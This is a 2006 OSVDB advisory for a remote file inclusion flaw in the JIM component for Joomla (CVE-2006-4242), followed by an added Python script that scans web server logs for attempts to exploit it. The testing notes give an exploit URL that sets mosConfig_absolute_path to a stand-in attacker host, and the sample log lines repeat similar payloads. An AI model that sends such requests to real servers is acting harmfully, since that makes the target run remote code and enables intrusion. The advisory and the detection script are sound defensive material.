JIM for Joomla install.jim.php mosConfig_absolute_path Variable Remote File Inclusion

2006-08-17T06:34:17
ID OSVDB:27990
Type osvdb
Reporter OSVDB
Modified 2006-08-17T06:34:17

Description

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).

Manual Testing Notes

http://[target]/[path]/administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=http://evil_script?
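
The request pattern above can be searched for in web server access logs. The following is an added example, not part of the original advisory: it flags any request that supplies mosConfig_absolute_path to install.jim.php and marks values that begin with a URL scheme. The log format (combined), the function names and the sample lines are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Script path and parameter name come from the advisory text.
SCRIPT = "/administrator/components/com_jim/install.jim.php"
PARAM = "mosConfig_absolute_path"
SCHEME = re.compile(r"^[a-z][a-z0-9+.\-]*://", re.I)  # http://, ftp://, ...
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(line):
    """Return (kind, value) for a request that sets PARAM on SCRIPT, else None."""
    m = REQUEST.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not unquote(url.path).lower().endswith(SCRIPT):
        return None
    # parse_qsl percent-decodes, so http%3A%2F%2F... is seen as http://...
    for key, value in parse_qsl(url.query, keep_blank_values=True):
        if key == PARAM:
            kind = "remote-url" if SCHEME.match(value.strip()) else "override"
            return kind, value
    return None

def scan(lines):
    """Return [(line_number, kind, value)] for every flagged line."""
    hits = []
    for n, line in enumerate(lines, 1):
        result = classify(line)
        if result:
            hits.append((n, *result))
    return hits

# Constructed sample lines (combined log format, documentation addresses).
SAMPLE_LOG = [
    '192.0.2.10 - - [17/Aug/2006:06:40:01 +0000] "GET /index.php?option=com_jim HTTP/1.1" 200 5120',
    '192.0.2.66 - - [17/Aug/2006:06:41:12 +0000] "GET /administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=http://host.example/s.txt? HTTP/1.0" 200 312',
    '192.0.2.66 - - [17/Aug/2006:06:41:15 +0000] "GET /cms/administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=ftp%3A%2F%2Fhost.example%2Fs HTTP/1.0" 200 298',
    '192.0.2.70 - - [17/Aug/2006:06:42:00 +0000] "GET /administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=/tmp HTTP/1.1" 200 10',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Only the query string is inspected. With register_globals on, PHP also populates variables from POST bodies and cookies, which a standard access log does not record.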

References:

Vendor URL: http://extensions.joomla.org/component/option,com_mtree/task,viewlink/link_id,884/Itemid,35/
Vendor Specific News/Changelog Entry: http://forum.joomla.org/index.php/topic,79477.0.html
Secunia Advisory ID: 21545
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-08/0365.html
Generic Exploit URL: http://milw0rm.com/exploits/2203
FrSIRT Advisory: ADV-2006-3313
CVE-2006-4242
Bugtraq ID: 19575